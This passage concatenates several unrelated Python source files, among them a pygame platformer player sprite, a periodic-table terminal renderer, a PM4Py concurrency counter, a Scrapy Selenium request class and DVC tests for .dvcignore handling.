return None
def main():
    """Demo entry point: look up the IMDb id for a sample torrent hash."""
    fetcher = KickAssFetcher()
    fetcher.search("252DDC4D3EF6E7EE393CD842239ACEB86BF7A546")


if __name__ == "__main__":
    main()
"""Constants for localtuya integration."""
ATTR_CURRENT = "current"
ATTR_CURRENT_CONSUMPTION = "current_consumption"
ATTR_VOLTAGE = "voltage"
CONF_LOCAL_KEY = "local_key"
CONF_PROTOCOL_VERSION = "protocol_version"
CONF_DPS_STRINGS = "dps_strings"
CONF_PRODUCT_KEY = "product_key"
# light
CONF_BRIGHTNESS_LOWER = "brightness_lower"
CONF_BRIGHTNESS_UPPER = "brightness_upper"
CONF_COLOR = "color"
CONF_COLOR_MODE = "color_mode"
CONF_COLOR_TEMP_MIN_KELVIN = "color_temp_min_kelvin"
CONF_COLOR_TEMP_MAX_KELVIN = "color_temp_max_kelvin"
CONF_COLOR_TEMP_REVERSE = "color_temp_reverse"
CONF_MUSIC_MODE = "music_mode"
# switch
CONF_CURRENT = "current"
CONF_CURRENT_CONSUMPTION = "current_consumption"
CONF_VOLTAGE = "voltage"
# cover
CONF_COMMANDS_SET = "commands_set"
CONF_POSITIONING_MODE = "positioning_mode"
CONF_CURRENT_POSITION_DP = "current_position_dp"
CONF_SET_POSITION_DP = "set_position_dp"
CONF_POSITION_INVERTED = "position_inverted"
CONF_SPAN_TIME = "span_time"
# fan
CONF_FAN_SPEED_CONTROL = "fan_speed_control"
CONF_FAN_OSCILLATING_CONTROL = "fan_oscillating_control"
CONF_FAN_SPEED_MIN = "fan_speed_min"
CONF_FAN_SPEED_MAX = "fan_speed_max"
CONF_FAN_ORDERED_LIST = "fan_speed_ordered_list"
CONF_FAN_DIRECTION = "fan_direction"
CONF_FAN_DIRECTION_FWD = "fan_direction_forward"
CONF_FAN_DIRECTION_REV = "fan_direction_reverse"
# sensor
CONF_SCALING = "scaling"
# climate
CONF_TARGET_TEMPERATURE_DP = "target_temperature_dp"
CONF_CURRENT_TEMPERATURE_DP = "current_temperature_dp"
CONF_TEMPERATURE_STEP = "temperature_step"
CONF_MAX_TEMP_DP = "max_temperature_dp"
CONF_MIN_TEMP_DP = "min_temperature_dp"
CONF_PRECISION = "precision"
CONF_TARGET_PRECISION = "target_precision"
CONF_HVAC_MODE_DP = "hvac_mode_dp"
CONF_HVAC_MODE_SET = "hvac_mode_set"
CONF_PRESET_DP = "preset_dp"
CONF_PRESET_SET = "preset_set"
CONF_HEURISTIC_ACTION = "heuristic_action"
CONF_HVAC_ACTION_DP = "hvac_action_dp"
CONF_HVAC_ACTION_SET = "hvac_action_set"
CONF_ECO_DP = "eco_dp"
CONF_ECO_VALUE = "eco_value"
# vacuum
CONF_POWERGO_DP = "powergo_dp"
CONF_IDLE_STATUS_VALUE = "idle_status_value"
CONF_RETURNING_STATUS_VALUE = "returning_status_value"
CONF_DOCKED_STATUS_VALUE = "docked_status_value"
CONF_BATTERY_DP = "battery_dp"
CONF_MODE_DP = "mode_dp"
CONF_MODES = "modes"
CONF_FAN_SPEED_DP = "fan_speed_dp"
CONF_FAN_SPEEDS = "fan_speeds"
CONF_CLEAN_TIME_DP = "clean_time_dp"
CONF_CLEAN_AREA_DP = "clean_area_dp"
CONF_CLEAN_RECORD_DP = "clean_record_dp"
CONF_LOCATE_DP = "locate_dp"
CONF_FAULT_DP = "fault_dp"
CONF_PAUSED_STATE = "paused_state"
CONF_RETURN_MODE = "return_mode"
CONF_STOP_STATUS = "stop_status"
DATA_DISCOVERY = "discovery"
DOMAIN = "localtuya"
# Platforms in this list must support config flows
PLATFORMS = [
"binary_sensor",
"climate",
"cover",
"fan",
"light",
"number",
"select",
"sensor",
"switch",
"vacuum",
]
TUYA_DEVICE = "tuya_device"
| 2,893 | 1,332 |
import pygame
from settings import *
import utils
class Player(pygame.sprite.Sprite):
    """Platformer player sprite.

    Implements smoothed horizontal movement, variable-height jumping with
    separate rise/fall gravity, coyote time and jump buffering. Tunables
    (TILE_SIZE, MAX_PLAYER_SPEED, MAX_JUMPS, ...) come from settings.
    """

    def __init__(self, pos, groups, collision_sprites):
        super().__init__(groups)
        self.image = pygame.Surface((TILE_SIZE / 2, TILE_SIZE))
        self.image.fill(PLAYER_COLOR)
        self.rect = self.image.get_rect(topleft=pos)
        self.collision_sprites = collision_sprites
        # Player movement
        self.direction_x = 0  # -1 = left, 1 = right, 0 = none
        self.velocity = pygame.math.Vector2()
        self.speed = MAX_PLAYER_SPEED
        # Jumping
        self.jumps_remaining = MAX_JUMPS
        self.is_grounded = False  # Is the player on the ground?
        self.was_grounded = False  # Used to determine if the player has left the ground this frame
        self.is_jumping = False  # Is the player jumping?
        self.jump_pressed = False  # Is the jump key currently pressed?
        self.jumping_locked = False  # Used to lock the player from jumping again until they release the jump key
        self.current_gravity = 0  # The current gravity affecting the player
        # Kinematics: choose gravity so a jump reaches MAX_JUMP_HEIGHT at
        # TIME_TO_JUMP_APEX; falling uses a heavier gravity for game feel.
        self.jump_gravity = (2 * MAX_JUMP_HEIGHT) / (TIME_TO_JUMP_APEX ** 2)
        self.fall_gravity = self.jump_gravity * FALL_GRAVITY_MULTIPLIER
        # NOTE(review): subtracting fall_gravity here looks like a one-frame
        # takeoff compensation — confirm intent.
        self.jump_velocity = ((-2 * MAX_JUMP_HEIGHT) / TIME_TO_JUMP_APEX) - self.fall_gravity
        # Time
        self.coyote_timer = COYOTE_TIME  # Time the player has to jump after leaving the ground
        self.jump_buffer_timer = JUMP_BUFFER_TIME  # Registers jump input as long as this is less than JUMP_BUFFER_TIME
        self.last_frame_ticks = 0  # Not used if using estimated delta_time (1/FPS)

    def process_input(self, events):
        """Process input events. This method is called by Level, which passes in the events from the main game loop."""
        for event in events:
            if event.type == pygame.KEYDOWN:
                if event.key == pygame.K_LEFT:  # Move left
                    self.direction_x = -1
                if event.key == pygame.K_RIGHT:  # Move right
                    self.direction_x = 1
                if event.key == pygame.K_UP:  # Jump
                    self.jump_pressed = True
                if event.key == pygame.K_g:  # Invert gravity just for fun
                    self.fall_gravity = -self.fall_gravity
                    self.current_gravity = -self.current_gravity
            if event.type == pygame.KEYUP:
                # Only cancel movement if the released key matches the
                # current direction (prevents left/right release conflicts).
                if event.key == pygame.K_LEFT and self.direction_x < 0:
                    self.direction_x = 0
                if event.key == pygame.K_RIGHT and self.direction_x > 0:
                    self.direction_x = 0
                if event.key == pygame.K_UP:
                    self.jump_pressed = False
                    self.jumping_locked = False

    def check_jump_buffer(self):
        """Conditionally applies jumping force to the player."""
        self.update_jump_buffer_timer()
        # Buffered input: jump was pressed within the last JUMP_BUFFER_TIME.
        jump_input = self.jump_buffer_timer < JUMP_BUFFER_TIME
        # Allowed mid-jump (multi-jump) or shortly after leaving the ground
        # (coyote time), unless the key is still held from a previous jump.
        can_jump = not self.jumping_locked and self.jumps_remaining > 0 and (
            self.is_jumping or self.coyote_timer < COYOTE_TIME)
        self.jumping_locked = self.jump_pressed
        if jump_input and can_jump:
            self.jump()

    def jump(self):
        """Start a jump: consume a jump, reset timers, apply launch velocity."""
        self.coyote_timer = COYOTE_TIME
        self.jump_buffer_timer = JUMP_BUFFER_TIME
        self.is_jumping = True
        self.jumps_remaining -= 1
        self.current_gravity = self.jump_gravity
        self.velocity.y = self.jump_velocity

    def update_air_timer(self):
        """Resets air timer if grounded, otherwise increments by delta time."""
        self.coyote_timer = 0 if self.is_grounded else round(self.coyote_timer + EST_DELTA_TIME, 2)

    def update_jump_buffer_timer(self):
        """Resets jump buffer timer if jump key pressed, otherwise increments by delta time."""
        self.jump_buffer_timer = 0 if self.jump_pressed and not self.jumping_locked else round(self.jump_buffer_timer + EST_DELTA_TIME, 2)

    def move(self):
        """Move the player and apply collisions."""
        self.velocity.y += self.current_gravity
        self.check_jump_buffer()  # Check if the player should jump this frame
        # Smooth-damp toward the target horizontal speed; snap tiny residual
        # x-velocities to exactly zero so the player actually stops.
        target_velocity = pygame.math.Vector2(self.direction_x * self.speed, self.velocity.y)
        self.velocity = utils.pygame_vector2_smooth_damp(self.velocity, target_velocity, SMOOTH_TIME, EST_DELTA_TIME)
        self.velocity.x = 0 if abs(self.velocity.x) < 2*SMOOTH_TIME else self.velocity.x
        # Horizontal movement and collisions
        self.rect.x += self.velocity.x
        for sprite in self.collision_sprites.sprites():
            if not sprite.rect.colliderect(self.rect): continue
            # Right collision
            elif abs(self.rect.right - sprite.rect.left) < COLLISION_TOLERANCE and self.velocity.x > 0:
                self.rect.right = sprite.rect.left
            # Left collision
            elif abs(self.rect.left - sprite.rect.right) < COLLISION_TOLERANCE and self.velocity.x < 0:
                self.rect.left = sprite.rect.right
            self.velocity.x = 0
            break
        # Vertical movement and collisions
        # Since vertical movement can be potentially a lot faster than horizontal due to gravity,
        # we need to check for collisions as we go each frame, instead of after moving by the velocity.
        for i in range(abs(int(self.velocity.y))):
            collided = False
            # Step one pixel at a time in the sign of the y-velocity.
            self.rect.y += abs(self.velocity.y) / self.velocity.y
            for sprite in self.collision_sprites.sprites():
                if not sprite.rect.colliderect(self.rect): continue
                # Bottom collision
                elif abs(self.rect.bottom - sprite.rect.top) < COLLISION_TOLERANCE and self.velocity.y > 0:
                    self.rect.bottom = sprite.rect.top
                # Top collision
                elif abs(self.rect.top - sprite.rect.bottom) < COLLISION_TOLERANCE and self.velocity.y < 0:
                    self.rect.top = sprite.rect.bottom
                self.velocity.y = 0
                collided = True
                break
            if collided: break
        # Set gravity to fall gravity scale if we're falling or not holding jump
        if (not self.is_grounded and (not self.jump_pressed or self.velocity.y > 0)):
            self.current_gravity = self.fall_gravity

    def set_grounded(self):
        """Moves the player down 1 pixel and checks for a collision."""
        self.rect.y += 1
        for sprite in self.collision_sprites.sprites():
            if sprite.rect.colliderect(self.rect):
                # Only count a collision at the feet as standing on ground.
                if not abs(self.rect.bottom - sprite.rect.top) < COLLISION_TOLERANCE: continue
                self.is_grounded = True
                self.was_grounded = True
                self.is_jumping = False
                self.jumps_remaining = MAX_JUMPS
                break
            else:
                self.is_grounded = False
                # Record the moment the player first leaves the ground.
                left_ground_this_frame = self.was_grounded and not self.is_grounded
                if not left_ground_this_frame: continue
                self.air_time_start = pygame.time.get_ticks()
                self.was_grounded = False
        self.rect.y -= 1

    def update(self):
        """Update the player."""
        self.update_air_timer()
        self.move()
        self.set_grounded()
        # NOTE(review): leftover debug prints — consider removing.
        print(f"jumps_remaining: {self.jumps_remaining}")
        print(f"jump_locked: {self.jumping_locked}")

    # Zombie method, only used if I decide I need perfect delta time (should probably remove this...)
    def update_delta_time(self):
        """Update the delta time."""
        self.delta_time = (pygame.time.get_ticks() - self.last_frame_ticks) / 1000
        self.last_frame_ticks = pygame.time.get_ticks()
from colored import fg, bg, attr
from . import elements
from . import layouts
class PeriodicTableError(Exception):
    """Raised for errors specific to the periodic-table package."""
class PeriodicTable:
    """Periodic Table renderer and element-spelling solver."""

    def __init__(self, **kwargs):
        # Supported kwargs: color (bool, default False) toggles ANSI colors;
        # width (terminal columns) is required by render_symbols.
        self.color = kwargs["color"] if "color" in kwargs else False
        self.width = kwargs["width"] if "width" in kwargs else None
        self.elements = elements.elements
        self.layouts = layouts.layouts

    def colorize_symbol(self, symbol, show_number=False):
        """Get a pretty version of a symbol or number."""
        # Layout spacer cells pass through unchanged.
        if symbol == " ":
            return " "
        symbol = symbol.lower().capitalize()
        text = f" {symbol:2} "
        if show_number:
            # Number rows show the atomic number instead of the symbol.
            number = str(self.elements[symbol]["number"])
            text = f" {number:3}"
        if self.color:
            element_color = self.elements[symbol]["color"]
            contrast_color = "white"
            # Yellow backgrounds need a non-white foreground to stay legible.
            if element_color == "yellow":
                contrast_color = "yellow_1"
            background_color = bg(element_color)
            text_color = fg(contrast_color) if show_number else fg("black")
            reset = attr("reset")
            text = f"{background_color}{text_color}{text}{reset}"
        return text

    def render_info(self, symbol):
        """Print summary information for a particular element."""
        if symbol not in self.elements:
            raise PeriodicTableError(f"Symbol not found in the periodic table")
        if self.color:
            self.render_symbols([symbol])
        element = self.elements[symbol]
        print(f"Symbol: {symbol}")
        print(f"Name: {element['name']}")
        if "origin" in element:
            print(f"Origin of name: {element['origin']}")
        print(f"Series: {element['series'].capitalize()}")
        print(f"Atomic number: {element['number']}")
        print(f"Period: {element['period']}")
        if "group" in element:
            print(f"Group: {element['group']}")

    def render_table(self, layout="standard", show_grid=False):
        """Print the classic periodic table using current output
        configuration."""
        if layout not in self.layouts:
            raise PeriodicTableError(f"Unknown table layout '{layout}'")
        if show_grid:
            print(" " + self.layouts[layout]["grid"])
            print()
        # Each period occupies two text lines (atomic numbers on the top
        # line, symbols below); stepping by 0.5 makes is_top_line alternate.
        period = 1
        for line in self.layouts[layout]["table"].splitlines():
            line = f" {line} "
            is_top_line = period == int(period)
            period += 0.5
            for symbol in self.elements:
                replacement = self.colorize_symbol(symbol, is_top_line)
                line = line.replace(f" {symbol:2} ", replacement)
            if show_grid:
                # Row header: period number on top lines only, within 1-7.
                header = int(period) if period < 8 and is_top_line else ' '
                line = f"{header} {line}"
            if self.color:
                # Second pass: color any cells the first pass did not match.
                reset = attr('reset')
                for symbol in self.elements:
                    color = bg(self.elements[symbol]["color"])
                    pattern = f" {symbol:2} "
                    line = line.replace(pattern, f"{color}{pattern}{reset}")
            print(line)

    def render_symbols(self, symbols):
        """Print a list of symbols using current output configuration."""
        # NOTE(review): raises TypeError if self.width was never supplied —
        # confirm callers always construct with width=...
        columns = int(self.width / 4)
        lines = [symbols[i:i + columns] for i in range(0, len(symbols), columns)]
        for line in lines:
            # Two rows per line: atomic numbers on top, symbols below.
            top = [self.colorize_symbol(symbol, show_number=True) for symbol in line]
            bottom = [self.colorize_symbol(symbol) for symbol in line]
            print("".join(top))
            print("".join(bottom))

    def get_solutions(self, word, recursing=False):
        """Find all permutations that can spell a word.

        Uses instance attributes (self.stack / self.results) as shared state
        for the recursion — not re-entrant across concurrent calls.
        """
        if not recursing:
            self.stack = []
            self.results = []
        word = word.lower()
        for symbol in self.elements:
            symbol = symbol.lower()
            if symbol == word:
                # Exact tail match: record the completed path once.
                if self.stack not in self.results:
                    self.stack.append(symbol)
                    self.results.append(self.stack)
                    # Rebinding to a copy keeps the stored result intact.
                    self.stack = self.stack[:-1]
                continue
            if symbol == word[:len(symbol)]:
                # Prefix match: descend on the remainder of the word.
                self.stack.append(symbol)
                self.get_solutions(word[len(symbol):], recursing=True)
                self.stack = self.stack[:-1]
        return sorted(self.results, key=self.get_solution_ranking)

    def get_solution_ranking(self, solution):
        """Score a solution based on length and number of repeated symbols."""
        return len(solution) + 100 * (len(solution) - len(set(solution)))

    def get_symbol_from_atomic_number(self, number):
        """Translate an atomic number into an element's symbol."""
        number = int(number)
        elements = self.elements
        matches = [e for e in elements if elements[e]["number"] == number]
        return matches[0] if matches else None
from datetime import date
from enum import IntEnum
class TransactionDirection(IntEnum):
    """Direction of money flow for a transaction."""
    EXPENSES = 0
    INCOME = 1


class Transaction:
    """Mutable record describing a single transaction staged for import."""

    def __init__(self):
        # Import bookkeeping flags.
        self.will_import = True
        self.is_modified = False
        # Core transaction data.
        self.transaction_date = date.today()
        self.payee = ''
        self.description = ''
        self.amount = 0
        self.currency = ''
        # Accounts involved in the transfer.
        self.bill_payment_account = ''
        self.direction = TransactionDirection.EXPENSES
        self.from_account = ''
        self.to_account = ''
| 536 | 162 |
'''
This file is part of PM4Py (More Info: https://pm4py.fit.fraunhofer.de).
PM4Py is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
PM4Py is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with PM4Py. If not, see <https://www.gnu.org/licenses/>.
'''
from enum import Enum
from pm4py.algo.discovery.dfg.adapters.pandas.df_statistics import get_concurrent_events_dataframe
from pm4py.util import exec_utils, constants, xes_constants
from typing import Optional, Dict, Any, Union, Tuple, List, Set
import pandas as pd
class Parameters(Enum):
    """Keys accepted in the parameters dict of :func:`apply`."""
    ACTIVITY_KEY = constants.PARAMETER_CONSTANT_ACTIVITY_KEY
    CASE_ID_KEY = constants.PARAMETER_CONSTANT_CASEID_KEY
    TIMESTAMP_KEY = constants.PARAMETER_CONSTANT_TIMESTAMP_KEY
    START_TIMESTAMP_KEY = constants.PARAMETER_CONSTANT_START_TIMESTAMP_KEY
    STRICT = "strict"  # require strictly-overlapping (positive-length) intervals
def apply(dataframe: pd.DataFrame, parameters: Optional[Dict[Union[str, Parameters], Any]] = None) -> Dict[Tuple[str, str], int]:
    """
    Gets the number of times for which two activities have been concurrent in the log

    Parameters
    --------------
    dataframe
        Pandas dataframe
    parameters
        Parameters of the algorithm, including:
        - Parameters.ACTIVITY_KEY => activity key
        - Parameters.CASE_ID_KEY => case id
        - Parameters.START_TIMESTAMP_KEY => start timestamp
        - Parameters.TIMESTAMP_KEY => complete timestamp
        - Parameters.STRICT => Determine if only entries that are strictly concurrent
        (i.e. the length of the intersection as real interval is > 0) should be obtained. Default: False

    Returns
    --------------
    ret_dict
        Dictionaries associating to a couple of activities (tuple) the number of times for which they have been
        executed in parallel in the log
    """
    if parameters is None:
        parameters = {}
    activity_key = exec_utils.get_param_value(Parameters.ACTIVITY_KEY, parameters, xes_constants.DEFAULT_NAME_KEY)
    case_id_glue = exec_utils.get_param_value(Parameters.CASE_ID_KEY, parameters, constants.CASE_CONCEPT_NAME)
    timestamp_key = exec_utils.get_param_value(Parameters.TIMESTAMP_KEY, parameters,
                                               xes_constants.DEFAULT_TIMESTAMP_KEY)
    start_timestamp_key = exec_utils.get_param_value(Parameters.START_TIMESTAMP_KEY, parameters, None)
    strict = exec_utils.get_param_value(Parameters.STRICT, parameters, False)
    concurrent_dataframe = get_concurrent_events_dataframe(dataframe, start_timestamp_key=start_timestamp_key,
                                                           timestamp_key=timestamp_key, case_id_glue=case_id_glue,
                                                           activity_key=activity_key, strict=strict)
    ret_dict0 = concurrent_dataframe.groupby([activity_key, activity_key + '_2']).size().to_dict()
    ret_dict = {}
    # Cast counts to plain Python int so callers never see numpy integer
    # types (e.g. np.int64) leaking out of the groupby.
    for el in ret_dict0:
        # Sort the pair so (a, b) and (b, a) collapse into a single key.
        # NOTE(review): if both orderings occur, the later count overwrites
        # the earlier one rather than summing — confirm that is intended.
        el2 = tuple(sorted(el))
        ret_dict[el2] = int(ret_dict0[el])
    return ret_dict
| 3,617 | 1,060 |
import os
import argparse
import yaml
import pprint
from easydict import EasyDict as edict
from download import download
from read_process import read_process
from de_analysis import de
from cancer import cancer
def parse_args():
    """Parse command-line options for the eCLIP pipeline."""
    parser = argparse.ArgumentParser(description='eCLIP')
    parser.add_argument(
        '--config',
        dest='config_file',
        default='configs.yml',
        type=str,
        help='configuration filename',
    )
    return parser.parse_args()
def load_config(config_path):
    """Load a YAML configuration file into an attribute-accessible dict.

    Parameters
    ----------
    config_path : str
        Path to the YAML configuration file.

    Returns
    -------
    easydict.EasyDict
        Parsed configuration supporting attribute-style access.
    """
    with open(config_path, 'r') as f:
        # yaml.load without an explicit Loader is deprecated and, with the
        # default loader, can construct arbitrary Python objects from
        # untrusted input; safe_load only builds plain data types.
        config = edict(yaml.safe_load(f))
    return config
def main():
    """Run the full eCLIP data-processing pipeline end to end."""
    print('ECLIP data processing pipeline.')

    # Load and echo the configuration file.
    args = parse_args()
    if args.config_file is None:
        raise Exception('no configuration file')
    config = load_config(args.config_file)
    pprint.PrettyPrinter(indent=2).pprint(config)

    # Pipeline stages in execution order: download raw data, process reads,
    # run differential-expression analysis, then the cancer analysis.
    for stage in (download, read_process, de, cancer):
        stage(config)


if __name__ == '__main__':
    main()
| 1,120 | 324 |
"""Module for custom Scrapy request components."""
from scrapy import Request
class SeleniumCallbackRequest(Request):
    """Process request with given callback using Selenium.

    Args:
        selenium_callback (func or None, optional): Function that will be
            called with the chrome webdriver. The function should take in
            parameters (request, spider, driver) and return request, response
            or None. If None, driver will be used for fetching the page, and
            return is response. Defaults to None.
    """

    def __init__(self, *args, selenium_callback=None, **kwargs):
        # Reuse the caller-supplied meta dict when present so its other
        # entries survive; otherwise start from an empty one.
        meta = kwargs.pop('meta', {}) or {}
        # Install the callback only if the caller did not already set one.
        meta.setdefault('selenium_callback', selenium_callback)
        super().__init__(*args, meta=meta, **kwargs)
| 887 | 226 |
import os
import shutil
import pytest
from dvc.exceptions import DvcIgnoreInCollectedDirError
from dvc.ignore import (
DvcIgnore,
DvcIgnoreDirs,
DvcIgnorePatterns,
DvcIgnorePatternsTrie,
DvcIgnoreRepo,
)
from dvc.path_info import PathInfo
from dvc.repo import Repo
from dvc.tree.local import LocalRemoteTree
from dvc.utils import relpath
from dvc.utils.fs import get_mtime_and_size
from tests.dir_helpers import TmpDir
def test_ignore(tmp_dir, dvc, monkeypatch):
    """Files matched by .dvcignore are excluded from tree walks."""
    # NOTE(review): the monkeypatch fixture is unused here.
    tmp_dir.gen({"dir": {"ignored": "text", "other": "text2"}})
    tmp_dir.gen(DvcIgnore.DVCIGNORE_FILE, "dir/ignored")
    # Drop the cached dvcignore so the freshly written file is re-read.
    dvc.tree.__dict__.pop("dvcignore", None)
    path = PathInfo(tmp_dir)
    assert set(dvc.tree.walk_files(path / "dir")) == {path / "dir" / "other"}
def test_ignore_unicode(tmp_dir, dvc):
    """.dvcignore patterns with non-ASCII names are honored."""
    tmp_dir.gen({"dir": {"other": "text", "тест": "проверка"}})
    tmp_dir.gen(DvcIgnore.DVCIGNORE_FILE, "dir/тест")
    # Drop the cached dvcignore so the freshly written file is re-read.
    dvc.tree.__dict__.pop("dvcignore", None)
    path = PathInfo(tmp_dir)
    assert set(dvc.tree.walk_files(path / "dir")) == {path / "dir" / "other"}
def test_rename_ignored_file(tmp_dir, dvc):
    """Renaming an ignored file leaves the directory mtime/size unchanged."""
    tmp_dir.gen({"dir": {"ignored": "...", "other": "text"}})
    tmp_dir.gen(DvcIgnore.DVCIGNORE_FILE, "ignored*")
    # Drop the cached dvcignore so the freshly written file is re-read.
    dvc.tree.__dict__.pop("dvcignore", None)
    mtime, size = get_mtime_and_size("dir", dvc.tree)
    shutil.move("dir/ignored", "dir/ignored_new")
    new_mtime, new_size = get_mtime_and_size("dir", dvc.tree)
    # Both old and new names match "ignored*", so nothing visible changed.
    assert new_mtime == mtime and new_size == size
def test_rename_file(tmp_dir, dvc):
    """Renaming a tracked file changes the directory mtime but not its size."""
    tmp_dir.gen({"dir": {"foo": "foo", "bar": "bar"}})
    mtime, size = get_mtime_and_size("dir", dvc.tree)
    shutil.move("dir/foo", "dir/foo_new")
    new_mtime, new_size = get_mtime_and_size("dir", dvc.tree)
    assert new_mtime != mtime and new_size == size
def test_remove_ignored_file(tmp_dir, dvc):
    """Deleting an ignored file must not affect the dir's mtime/size."""
    tmp_dir.gen({"dir": {"ignored": "...", "other": "text"}})
    tmp_dir.gen(DvcIgnore.DVCIGNORE_FILE, "dir/ignored")
    dvc.tree.__dict__.pop("dvcignore", None)
    before = get_mtime_and_size("dir", dvc.tree)
    os.remove("dir/ignored")
    after = get_mtime_and_size("dir", dvc.tree)
    assert after == before
def test_remove_file(tmp_dir, dvc):
    """Deleting a non-ignored file changes both the dir mtime and size."""
    tmp_dir.gen({"dir": {"foo": "foo", "bar": "bar"}})
    mtime_before, size_before = get_mtime_and_size("dir", dvc.tree)
    os.remove("dir/foo")
    mtime_after, size_after = get_mtime_and_size("dir", dvc.tree)
    assert mtime_after != mtime_before
    assert size_after != size_before
def test_dvcignore_in_out_dir(tmp_dir, dvc):
    """`dvc add` must refuse a directory that contains a .dvcignore file."""
    tmp_dir.gen({"dir": {"foo": "foo", DvcIgnore.DVCIGNORE_FILE: ""}})
    with pytest.raises(DvcIgnoreInCollectedDirError):
        dvc.add("dir")
@pytest.mark.parametrize("dname", ["dir", "dir/subdir"])
def test_ignore_collecting_dvcignores(tmp_dir, dvc, dname):
    """A .dvcignore inside an ignored directory must not be collected.

    The patterns visible for the nested ignore file's path must come only
    from the *top* ignore file (which ignores ``dname`` itself).
    """
    tmp_dir.gen({"dir": {"subdir": {}}})
    # Sibling .dvcignore of `dname` that ignores `dname` entirely.
    top_ignore_file = (tmp_dir / dname).with_name(DvcIgnore.DVCIGNORE_FILE)
    top_ignore_file.write_text(os.path.basename(dname))
    # Drop the cached dvcignore so the new files are re-read.
    dvc.tree.__dict__.pop("dvcignore", None)
    ignore_file = tmp_dir / dname / DvcIgnore.DVCIGNORE_FILE
    ignore_file.write_text("foo")
    assert len(dvc.tree.dvcignore.ignores) == 3
    assert DvcIgnoreDirs([".git", ".hg", ".dvc"]) in dvc.tree.dvcignore.ignores
    ignore_pattern_trie = None
    for ignore in dvc.tree.dvcignore.ignores:
        if isinstance(ignore, DvcIgnorePatternsTrie):
            ignore_pattern_trie = ignore
    assert ignore_pattern_trie is not None
    # Lookup for the nested file's path resolves to the top ignore file's
    # patterns only — the nested .dvcignore lives in an ignored dir.
    assert (
        DvcIgnorePatterns.from_files(
            os.fspath(top_ignore_file),
            LocalRemoteTree(None, {"url": dvc.root_dir}),
        )
        == ignore_pattern_trie[os.fspath(ignore_file)]
    )
    assert any(
        i for i in dvc.tree.dvcignore.ignores if isinstance(i, DvcIgnoreRepo)
    )
def test_ignore_on_branch(tmp_dir, scm, dvc):
    """.dvcignore is read from the tree in use: the working tree has no
    ignore file, while branch "branch" ignores "foo"."""
    tmp_dir.scm_gen({"foo": "foo", "bar": "bar"}, commit="add files")
    with tmp_dir.branch("branch", new=True):
        tmp_dir.scm_gen(DvcIgnore.DVCIGNORE_FILE, "foo", commit="add ignore")
    dvc.tree.__dict__.pop("dvcignore", None)
    path = PathInfo(tmp_dir)
    # Working tree: no .dvcignore here, both files visible.
    assert set(dvc.tree.walk_files(path)) == {
        path / "foo",
        path / "bar",
    }
    # Branch tree: "foo" is ignored by the committed .dvcignore.
    # NOTE(review): this comparison uses os.fspath strings while the one
    # above compares PathInfo objects — presumably the git tree yields
    # plain strings; confirm against scm.get_tree's walk_files.
    dvc.tree = scm.get_tree("branch", use_dvcignore=True)
    assert set(dvc.tree.walk_files(path)) == {
        os.fspath(path / DvcIgnore.DVCIGNORE_FILE),
        os.fspath(path / "bar"),
    }
def test_match_nested(tmp_dir, dvc):
    """Bare patterns apply at every depth: '*.backup' and 'tmp' also match
    inside subdirectories."""
    tmp_dir.gen(
        {
            ".dvcignore": "*.backup\ntmp",
            "foo": "foo",
            "tmp": "...",
            "dir": {"x.backup": "x backup", "tmp": "content"},
        }
    )
    dvc.tree.__dict__.pop("dvcignore", None)
    walked = dvc.tree.walk_files(".")
    survivors = {os.fspath(os.path.normpath(entry)) for entry in walked}
    assert survivors == {".dvcignore", "foo"}
def test_ignore_external(tmp_dir, scm, dvc, tmp_path_factory):
    """.dvcignore rules do NOT apply to paths outside the repo."""
    tmp_dir.gen(".dvcignore", "*.backup\ntmp")
    ext_dir = TmpDir(os.fspath(tmp_path_factory.mktemp("external_dir")))
    ext_dir.gen({"y.backup": "y", "tmp": "ext tmp"})
    found = {relpath(entry, ext_dir) for entry in dvc.tree.walk_files(ext_dir)}
    # Both files survive: the repo's ignore patterns have no effect here.
    assert found == {"y.backup", "tmp"}
def test_ignore_subrepo(tmp_dir, scm, dvc):
    """A parent repo's .dvcignore does not leak into a sub-repo."""
    tmp_dir.gen({".dvcignore": "foo", "subdir": {"foo": "foo"}})
    scm.add([".dvcignore"])
    scm.commit("init parent dvcignore")
    dvc.tree.__dict__.pop("dvcignore", None)
    subrepo_dir = tmp_dir / "subdir"
    # The parent repo's tree hides subdir/foo ...
    assert not dvc.tree.exists(PathInfo(subrepo_dir / "foo"))
    with subrepo_dir.chdir():
        subrepo = Repo.init(subdir=True)
    scm.add(str(subrepo_dir / "foo"))
    scm.commit("subrepo init")
    # ... but the sub-repo's own tree must see it on every commit.
    for _ in subrepo.brancher(all_commits=True):
        assert subrepo.tree.exists(PathInfo(subrepo_dir / "foo"))
def test_ignore_blank_line(tmp_dir, dvc):
    """Blank lines in .dvcignore are skipped, not treated as patterns."""
    tmp_dir.gen({"dir": {"ignored": "text", "other": "text2"}})
    tmp_dir.gen(DvcIgnore.DVCIGNORE_FILE, "foo\n\ndir/ignored")
    dvc.tree.__dict__.pop("dvcignore", None)
    root = PathInfo(tmp_dir)
    survivors = set(dvc.tree.walk_files(root / "dir"))
    assert survivors == {root / "dir" / "other"}
# It is not possible to re-include a file if a parent directory of
# that file is excluded.
# Git doesn’t list excluded directories for performance reasons,
# so any patterns on contained files have no effect,
# no matter where they are defined.
@pytest.mark.parametrize(
    "data_struct, pattern_list, result_set",
    [
        (
            {"dir": {"subdir": {"not_ignore": "121"}}},
            ["subdir/*", "!not_ignore"],
            {os.path.join("dir", "subdir", "not_ignore")},
        ),
        (
            {"dir": {"subdir": {"should_ignore": "121"}}},
            ["subdir", "!should_ignore"],
            set(),
        ),
        (
            {"dir": {"subdir": {"should_ignore": "121"}}},
            ["subdir/", "!should_ignore"],
            set(),
        ),
    ],
)
def test_ignore_file_in_parent_path(
    tmp_dir, dvc, data_struct, pattern_list, result_set
):
    """A file cannot be re-included (`!pattern`) if a parent directory of
    that file is excluded — matching git's documented behaviour."""
    tmp_dir.gen(data_struct)
    tmp_dir.gen(DvcIgnore.DVCIGNORE_FILE, "\n".join(pattern_list))
    dvc.tree.__dict__.pop("dvcignore", None)
    path = PathInfo(tmp_dir)
    # Renamed the comprehension variable: the original `relpath` shadowed
    # the `relpath` helper imported at module level.
    assert set(dvc.tree.walk_files(path / "dir")) == {
        path / rel for rel in result_set
    }
# If there is a separator at the end of the pattern then the pattern
# will only match directories,
